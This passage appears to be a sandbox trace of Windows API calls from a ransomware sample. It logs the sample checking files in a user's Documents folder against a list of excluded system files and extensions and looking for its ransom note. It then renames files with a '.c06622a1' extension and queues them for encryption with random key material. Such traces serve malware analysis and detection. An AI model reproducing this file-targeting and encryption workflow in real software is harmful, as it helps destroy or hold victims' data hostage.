_wcsicmp (_Str1="icns", _Str2="pps") returned -7 [0158.263] wcslen (_String="icns") returned 0x4 [0158.263] _wcsicmp (_Str1="ico", _Str2="pps") returned -7 [0158.263] wcslen (_String="ico") returned 0x3 [0158.263] _wcsicmp (_Str1="ics", _Str2="pps") returned -7 [0158.263] wcslen (_String="ics") returned 0x3 [0158.263] _wcsicmp (_Str1="idx", _Str2="pps") returned -7 [0158.263] wcslen (_String="idx") returned 0x3 [0158.263] _wcsicmp (_Str1="ldf", _Str2="pps") returned -4 [0158.263] wcslen (_String="ldf") returned 0x3 [0158.263] _wcsicmp (_Str1="lnk", _Str2="pps") returned -4 [0158.263] wcslen (_String="lnk") returned 0x3 [0158.263] _wcsicmp (_Str1="mod", _Str2="pps") returned -3 [0158.263] wcslen (_String="mod") returned 0x3 [0158.263] _wcsicmp (_Str1="mpa", _Str2="pps") returned -3 [0158.263] wcslen (_String="mpa") returned 0x3 [0158.263] _wcsicmp (_Str1="msc", _Str2="pps") returned -3 [0158.263] wcslen (_String="msc") returned 0x3 [0158.263] _wcsicmp (_Str1="msp", _Str2="pps") returned -3 [0158.263] wcslen (_String="msp") returned 0x3 [0158.263] _wcsicmp (_Str1="msstyles", _Str2="pps") returned -3 [0158.263] wcslen (_String="msstyles") returned 0x8 [0158.263] _wcsicmp (_Str1="msu", _Str2="pps") returned -3 [0158.263] wcslen (_String="msu") returned 0x3 [0158.263] _wcsicmp (_Str1="nls", _Str2="pps") returned -2 [0158.263] wcslen (_String="nls") returned 0x3 [0158.263] _wcsicmp (_Str1="nomedia", _Str2="pps") returned -2 [0158.264] wcslen (_String="nomedia") returned 0x7 [0158.264] _wcsicmp (_Str1="ocx", _Str2="pps") returned -1 [0158.264] wcslen (_String="ocx") returned 0x3 [0158.264] _wcsicmp (_Str1="prf", _Str2="pps") returned 2 [0158.264] wcslen (_String="prf") returned 0x3 [0158.264] _wcsicmp (_Str1="ps1", _Str2="pps") returned 3 [0158.264] wcslen (_String="ps1") returned 0x3 [0158.264] _wcsicmp (_Str1="rom", _Str2="pps") returned 2 [0158.264] wcslen (_String="rom") returned 0x3 [0158.264] _wcsicmp (_Str1="rtp", _Str2="pps") returned 2 [0158.264] wcslen (_String="rtp") returned 0x3 [0158.264] _wcsicmp (_Str1="scr", _Str2="pps") returned 3 [0158.264] wcslen (_String="scr") returned 0x3 [0158.264] _wcsicmp (_Str1="shs", _Str2="pps") returned 3 [0158.264] wcslen (_String="shs") returned 0x3 [0158.264] _wcsicmp (_Str1="spl", _Str2="pps") returned 3 [0158.264] wcslen (_String="spl") returned 0x3 [0158.264] _wcsicmp (_Str1="sys", _Str2="pps") returned 3 [0158.264] wcslen (_String="sys") returned 0x3 [0158.265] _wcsicmp (_Str1="theme", _Str2="pps") returned 4 [0158.265] wcslen (_String="theme") returned 0x5 [0158.265] _wcsicmp (_Str1="themepack", _Str2="pps") returned 4 [0158.265] wcslen (_String="themepack") returned 0x9 [0158.265] _wcsicmp (_Str1="wpx", _Str2="pps") returned 7 [0158.265] wcslen (_String="wpx") returned 0x3 [0158.265] _wcsicmp (_Str1="lock", _Str2="pps") returned -4 [0158.265] wcslen (_String="lock") returned 0x4 [0158.265] _wcsicmp (_Str1="key", _Str2="pps") returned -5 [0158.265] wcslen (_String="key") returned 0x3 [0158.265] _wcsicmp (_Str1="hta", _Str2="pps") returned -8 [0158.265] wcslen (_String="hta") returned 0x3 [0158.265] _wcsicmp (_Str1="msi", _Str2="pps") returned -3 [0158.265] wcslen (_String="msi") returned 0x3 [0158.265] _wcsicmp (_Str1="pdb", _Str2="pps") returned -12 [0158.265] wcslen (_String="pdb") returned 0x3 [0158.265] _wcsicmp (_Str1="sqlite", _Str2="pps") returned 3 [0158.265] wcslen (_String="sqlite") returned 0x6 [0158.265] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe")) returned 0x10 [0158.265] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.266] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" [0158.266] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned 0x4f [0158.266] wcscpy (in: _Dest=0x32a0130, _Source="2ySz27JapBU0Oa.pps" | out: _Dest="2ySz27JapBU0Oa.pps") returned="2ySz27JapBU0Oa.pps" [0158.266] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\2ySz27JapBU0Oa.pps", dwFileAttributes=0x80) returned 1 [0158.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\2ySz27JapBU0Oa.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\2ysz27japbu0oa.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0158.266] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.267] ReadFile (in: hFile=0x198, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.267] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x6b60c4f4 [0158.267] RtlComputeCrc32 (PartialCrc=0xc4f4, Buffer=0x32e4a4, Length=0x80) returned 0x1523783 [0158.267] RtlComputeCrc32 (PartialCrc=0x3783, Buffer=0x32e4a4, Length=0x80) returned 0xa18f5d7c [0158.267] RtlComputeCrc32 (PartialCrc=0x5d7c, Buffer=0x32e4a4, Length=0x80) returned 0x4d0dda7a [0158.267] RtlComputeCrc32 (PartialCrc=0xda7a, Buffer=0x32e4a4, Length=0x80) returned 0x6654b87f [0158.268] CloseHandle (hObject=0x198) returned 1 [0158.268] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.268] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\2ySz27JapBU0Oa.pps" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\2ySz27JapBU0Oa.pps") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\2ySz27JapBU0Oa.pps" [0158.268] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\2ySz27JapBU0Oa.pps") returned 0x62 [0158.268] wcscpy (in: _Dest=0x32b015c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.268] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\2ySz27JapBU0Oa.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\2ysz27japbu0oa.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\2ySz27JapBU0Oa.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\2ysz27japbu0oa.pps.c06622a1"), dwFlags=0x8) returned 1 [0158.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\2ySz27JapBU0Oa.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\2ysz27japbu0oa.pps.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x198 [0158.273] CreateIoCompletionPort (FileHandle=0x198, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0158.273] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0158.278] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7fbce623 [0158.278] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x76c09a88 [0158.278] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x39ed63f2 [0158.278] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2c3f38a9 [0158.278] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1e9c1904 [0158.278] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5971b48b [0158.278] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1d3cfe5e [0158.278] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x784860ee [0158.281] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0xec41be2a [0158.281] RtlComputeCrc32 (PartialCrc=0xbe2a, Buffer=0x710094, Length=0x80) returned 0xc2b60b0 [0158.281] RtlComputeCrc32 (PartialCrc=0x60b0, Buffer=0x710094, Length=0x80) returned 0xe392e2 [0158.281] RtlComputeCrc32 (PartialCrc=0x92e2, Buffer=0x710094, Length=0x80) returned 0xecfefd51 [0158.281] RtlComputeCrc32 (PartialCrc=0xfd51, Buffer=0x710094, Length=0x80) returned 0x5d8cb14a [0158.281] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0158.282] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.282] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.282] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e3ec5b0, ftCreationTime.dwHighDateTime=0x1d5dd22, ftLastAccessTime.dwLowDateTime=0xa8643490, ftLastAccessTime.dwHighDateTime=0x1d5e22e, ftLastWriteTime.dwLowDateTime=0xa8643490, ftLastWriteTime.dwHighDateTime=0x1d5e22e, nFileSizeHigh=0x0, nFileSizeLow=0x2240, dwReserved0=0x0, dwReserved1=0x0, cFileName="6hPV.csv", cAlternateFileName="")) returned 1 [0158.282] _wcsicmp (_Str1="6hPV.csv", _Str2="README.c06622a1.TXT") returned -60 [0158.282] wcsstr (_Str="6hPV.csv", _SubStr="README") returned 0x0 [0158.282] _wcsicmp (_Str1="autorun.inf", _Str2="6hPV.csv") returned 43 [0158.282] wcslen (_String="autorun.inf") returned 0xb [0158.282] _wcsicmp (_Str1="boot.ini", _Str2="6hPV.csv") returned 44 [0158.282] wcslen (_String="boot.ini") returned 0x8 [0158.282] _wcsicmp (_Str1="bootfont.bin", _Str2="6hPV.csv") returned 44 [0158.282] wcslen (_String="bootfont.bin") returned 0xc [0158.282] _wcsicmp (_Str1="bootsect.bak", _Str2="6hPV.csv") returned 44 [0158.282] wcslen (_String="bootsect.bak") returned 0xc [0158.282] _wcsicmp (_Str1="desktop.ini", _Str2="6hPV.csv") returned 46 [0158.282] wcslen (_String="desktop.ini") returned 0xb [0158.282] _wcsicmp (_Str1="iconcache.db", _Str2="6hPV.csv") returned 51 [0158.282] wcslen (_String="iconcache.db") returned 0xc [0158.282] _wcsicmp (_Str1="ntldr", _Str2="6hPV.csv") returned 56 [0158.282] wcslen (_String="ntldr") returned 0x5 [0158.282] _wcsicmp (_Str1="ntuser.dat", _Str2="6hPV.csv") returned 56 [0158.282] wcslen (_String="ntuser.dat") returned 0xa [0158.282] _wcsicmp (_Str1="ntuser.dat.log", _Str2="6hPV.csv") returned 56 [0158.283] wcslen (_String="ntuser.dat.log") returned 0xe [0158.283] _wcsicmp (_Str1="ntuser.ini", _Str2="6hPV.csv") returned 56 [0158.283] wcslen (_String="ntuser.ini") returned 0xa [0158.283] _wcsicmp (_Str1="thumbs.db", _Str2="6hPV.csv") returned 62 [0158.283] wcslen (_String="thumbs.db") returned 0x9 [0158.283] _wcsicmp (_Str1="386", _Str2="csv") returned -48 [0158.283] wcslen (_String="386") returned 0x3 [0158.283] _wcsicmp (_Str1="adv", _Str2="csv") returned -2 [0158.283] wcslen (_String="adv") returned 0x3 [0158.283] _wcsicmp (_Str1="ani", _Str2="csv") returned -2 [0158.283] wcslen (_String="ani") returned 0x3 [0158.283] _wcsicmp (_Str1="bat", _Str2="csv") returned -1 [0158.283] wcslen (_String="bat") returned 0x3 [0158.283] _wcsicmp (_Str1="bin", _Str2="csv") returned -1 [0158.283] wcslen (_String="bin") returned 0x3 [0158.283] _wcsicmp (_Str1="cab", _Str2="csv") returned -18 [0158.283] wcslen (_String="cab") returned 0x3 [0158.283] _wcsicmp (_Str1="cmd", _Str2="csv") returned -6 [0158.283] wcslen (_String="cmd") returned 0x3 [0158.283] _wcsicmp (_Str1="com", _Str2="csv") returned -4 [0158.283] wcslen (_String="com") returned 0x3 [0158.283] _wcsicmp (_Str1="cpl", _Str2="csv") returned -3 [0158.283] wcslen (_String="cpl") returned 0x3 [0158.283] _wcsicmp (_Str1="cur", _Str2="csv") returned 2 [0158.283] wcslen (_String="cur") returned 0x3 [0158.283] _wcsicmp (_Str1="deskthemepack", _Str2="csv") returned 1 [0158.283] wcslen (_String="deskthemepack") returned 0xd [0158.283] _wcsicmp (_Str1="diagcab", _Str2="csv") returned 1 [0158.283] wcslen (_String="diagcab") returned 0x7 [0158.283] _wcsicmp (_Str1="diagcfg", _Str2="csv") returned 1 [0158.283] wcslen (_String="diagcfg") returned 0x7 [0158.283] _wcsicmp (_Str1="diagpkg", _Str2="csv") returned 1 [0158.284] wcslen (_String="diagpkg") returned 0x7 [0158.284] _wcsicmp (_Str1="dll", _Str2="csv") returned 1 [0158.284] wcslen (_String="dll") returned 0x3 [0158.284] _wcsicmp (_Str1="drv", _Str2="csv") returned 1 [0158.284] wcslen (_String="drv") returned 0x3 [0158.284] _wcsicmp (_Str1="exe", _Str2="csv") returned 2 [0158.284] wcslen (_String="exe") returned 0x3 [0158.284] _wcsicmp (_Str1="hlp", _Str2="csv") returned 5 [0158.284] wcslen (_String="hlp") returned 0x3 [0158.284] _wcsicmp (_Str1="icl", _Str2="csv") returned 6 [0158.284] wcslen (_String="icl") returned 0x3 [0158.284] _wcsicmp (_Str1="icns", _Str2="csv") returned 6 [0158.284] wcslen (_String="icns") returned 0x4 [0158.284] _wcsicmp (_Str1="ico", _Str2="csv") returned 6 [0158.284] wcslen (_String="ico") returned 0x3 [0158.284] _wcsicmp (_Str1="ics", _Str2="csv") returned 6 [0158.284] wcslen (_String="ics") returned 0x3 [0158.284] _wcsicmp (_Str1="idx", _Str2="csv") returned 6 [0158.284] wcslen (_String="idx") returned 0x3 [0158.284] _wcsicmp (_Str1="ldf", _Str2="csv") returned 9 [0158.284] wcslen (_String="ldf") returned 0x3 [0158.284] _wcsicmp (_Str1="lnk", _Str2="csv") returned 9 [0158.284] wcslen (_String="lnk") returned 0x3 [0158.284] _wcsicmp (_Str1="mod", _Str2="csv") returned 10 [0158.284] wcslen (_String="mod") returned 0x3 [0158.284] _wcsicmp (_Str1="mpa", _Str2="csv") returned 10 [0158.284] wcslen (_String="mpa") returned 0x3 [0158.284] _wcsicmp (_Str1="msc", _Str2="csv") returned 10 [0158.285] wcslen (_String="msc") returned 0x3 [0158.285] _wcsicmp (_Str1="msp", _Str2="csv") returned 10 [0158.285] wcslen (_String="msp") returned 0x3 [0158.285] _wcsicmp (_Str1="msstyles", _Str2="csv") returned 10 [0158.285] wcslen (_String="msstyles") returned 0x8 [0158.285] _wcsicmp (_Str1="msu", _Str2="csv") returned 10 [0158.285] wcslen (_String="msu") returned 0x3 [0158.285] _wcsicmp (_Str1="nls", _Str2="csv") returned 11 [0158.285] wcslen (_String="nls") returned 0x3 [0158.285] _wcsicmp (_Str1="nomedia", _Str2="csv") returned 11 [0158.285] wcslen (_String="nomedia") returned 0x7 [0158.285] _wcsicmp (_Str1="ocx", _Str2="csv") returned 12 [0158.285] wcslen (_String="ocx") returned 0x3 [0158.285] _wcsicmp (_Str1="prf", _Str2="csv") returned 13 [0158.285] wcslen (_String="prf") returned 0x3 [0158.285] _wcsicmp (_Str1="ps1", _Str2="csv") returned 13 [0158.285] wcslen (_String="ps1") returned 0x3 [0158.285] _wcsicmp (_Str1="rom", _Str2="csv") returned 15 [0158.285] wcslen (_String="rom") returned 0x3 [0158.285] _wcsicmp (_Str1="rtp", _Str2="csv") returned 15 [0158.286] wcslen (_String="rtp") returned 0x3 [0158.286] _wcsicmp (_Str1="scr", _Str2="csv") returned 16 [0158.286] wcslen (_String="scr") returned 0x3 [0158.286] _wcsicmp (_Str1="shs", _Str2="csv") returned 16 [0158.286] wcslen (_String="shs") returned 0x3 [0158.286] _wcsicmp (_Str1="spl", _Str2="csv") returned 16 [0158.286] wcslen (_String="spl") returned 0x3 [0158.286] _wcsicmp (_Str1="sys", _Str2="csv") returned 16 [0158.286] wcslen (_String="sys") returned 0x3 [0158.286] _wcsicmp (_Str1="theme", _Str2="csv") returned 17 [0158.286] wcslen (_String="theme") returned 0x5 [0158.286] _wcsicmp (_Str1="themepack", _Str2="csv") returned 17 [0158.286] wcslen (_String="themepack") returned 0x9 [0158.286] _wcsicmp (_Str1="wpx", _Str2="csv") returned 20 [0158.286] wcslen (_String="wpx") returned 0x3 [0158.286] _wcsicmp (_Str1="lock", _Str2="csv") returned 9 [0158.286] wcslen (_String="lock") returned 0x4 [0158.286] _wcsicmp (_Str1="key", _Str2="csv") returned 8 [0158.286] wcslen (_String="key") returned 0x3 [0158.286] _wcsicmp (_Str1="hta", _Str2="csv") returned 5 [0158.286] wcslen (_String="hta") returned 0x3 [0158.286] _wcsicmp (_Str1="msi", _Str2="csv") returned 10 [0158.286] wcslen (_String="msi") returned 0x3 [0158.286] _wcsicmp (_Str1="pdb", _Str2="csv") returned 13 [0158.286] wcslen (_String="pdb") returned 0x3 [0158.286] _wcsicmp (_Str1="sqlite", _Str2="csv") returned 16 [0158.286] wcslen (_String="sqlite") returned 0x6 [0158.286] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe")) returned 0x10 [0158.287] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.287] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" [0158.287] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned 0x4f [0158.287] wcscpy (in: _Dest=0x32a0130, _Source="6hPV.csv" | out: _Dest="6hPV.csv") returned="6hPV.csv" [0158.287] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6hPV.csv", dwFileAttributes=0x80) returned 1 [0158.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6hPV.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\6hpv.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0158.287] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.287] ReadFile (in: hFile=0x1ac, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.288] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x24622ec4 [0158.288] RtlComputeCrc32 (PartialCrc=0x2ec4, Buffer=0x32e4a4, Length=0x80) returned 0x8fc1bf53 [0158.288] RtlComputeCrc32 (PartialCrc=0xbf53, Buffer=0x32e4a4, Length=0x80) returned 0x358fb60 [0158.288] RtlComputeCrc32 (PartialCrc=0xfb60, Buffer=0x32e4a4, Length=0x80) returned 0xb287d99e [0158.288] RtlComputeCrc32 (PartialCrc=0xd99e, Buffer=0x32e4a4, Length=0x80) returned 0x26cd3afb [0158.288] CloseHandle (hObject=0x1ac) returned 1 [0158.288] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.288] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6hPV.csv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6hPV.csv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6hPV.csv" [0158.288] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6hPV.csv") returned 0x58 [0158.288] wcscpy (in: _Dest=0x32b0148, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.289] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6hPV.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\6hpv.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6hPV.csv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\6hpv.csv.c06622a1"), dwFlags=0x8) returned 1 [0158.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\6hPV.csv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\6hpv.csv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ac [0158.291] CreateIoCompletionPort (FileHandle=0x1ac, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0158.291] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0158.297] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x38470dba [0158.297] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x17836d3c [0158.297] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xa91b8be [0158.297] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x710d01d3 [0158.297] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7ecfe3a2 [0158.297] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x47f10e1b [0158.297] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x62ae7f45 [0158.298] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x23cc4857 [0158.301] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x44ec798d [0158.301] RtlComputeCrc32 (PartialCrc=0x798d, Buffer=0x2690094, Length=0x80) returned 0xce7baaf3 [0158.301] RtlComputeCrc32 (PartialCrc=0xaaf3, Buffer=0x2690094, Length=0x80) returned 0x73f52950 [0158.301] RtlComputeCrc32 (PartialCrc=0x2950, Buffer=0x2690094, Length=0x80) returned 0x45e70dc0 [0158.301] RtlComputeCrc32 (PartialCrc=0xdc0, Buffer=0x2690094, Length=0x80) returned 0xe81c6023 [0158.301] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0158.301] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.301] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.301] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d6a54e0, ftCreationTime.dwHighDateTime=0x1d5d9bd, ftLastAccessTime.dwLowDateTime=0x130a1040, ftLastAccessTime.dwHighDateTime=0x1d5de0f, ftLastWriteTime.dwLowDateTime=0x130a1040, ftLastWriteTime.dwHighDateTime=0x1d5de0f, nFileSizeHigh=0x0, nFileSizeLow=0x6d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="6z8JjAGWT6AK.odp", cAlternateFileName="6Z8JJA~1.ODP")) returned 1 [0158.301] _wcsicmp (_Str1="6z8JjAGWT6AK.odp", _Str2="README.c06622a1.TXT") returned -60 [0158.301] wcsstr (_Str="6z8JjAGWT6AK.odp", _SubStr="README") returned 0x0 [0158.301] _wcsicmp (_Str1="autorun.inf", _Str2="6z8JjAGWT6AK.odp") returned 43 [0158.301] wcslen (_String="autorun.inf") returned 0xb [0158.301] _wcsicmp (_Str1="boot.ini", _Str2="6z8JjAGWT6AK.odp") returned 44 [0158.301] wcslen (_String="boot.ini") returned 0x8 [0158.301] _wcsicmp (_Str1="bootfont.bin", _Str2="6z8JjAGWT6AK.odp") returned 44 [0158.301] wcslen (_String="bootfont.bin") returned 0xc [0158.301] _wcsicmp (_Str1="bootsect.bak", _Str2="6z8JjAGWT6AK.odp") returned 44 [0158.301] wcslen (_String="bootsect.bak") returned 0xc [0158.301] _wcsicmp (_Str1="desktop.ini", _Str2="6z8JjAGWT6AK.odp") returned 46 [0158.301] wcslen (_String="desktop.ini") returned 0xb [0158.301] _wcsicmp 